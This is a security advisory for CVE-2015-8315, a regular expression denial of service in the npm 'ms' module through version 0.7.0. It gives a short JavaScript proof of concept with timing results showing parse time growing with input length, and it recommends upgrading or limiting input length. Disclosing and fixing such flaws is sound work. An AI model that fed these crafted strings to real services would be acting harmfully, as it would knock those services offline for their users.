Regular Expression Denial of Service

Module: ms

Published: October 24th, 2015

Reported by: Adam Baldwin

CVE-2015-8315

CWE-400

Vulnerable: <=0.7.0
Patched: >0.7.0

Overview

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

var ms = require('ms');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Results

Showing increase in execution time based on the input string.

$ time node ms.js 10000

real    0m0.758s
user    0m0.724s
sys    0m0.031s

$ time node ms.js 20000

real    0m2.580s
user    0m2.494s
sys    0m0.047s

$ time node ms.js 30000

real    0m5.747s
user    0m5.483s
sys    0m0.080s

$ time node ms.js 80000

real    0m41.022s
user    0m38.894s
sys    0m0.529s

Remediation

Update to version 0.7.1 or later. Alternatively, apply a reasonable length limit to parsed version strings.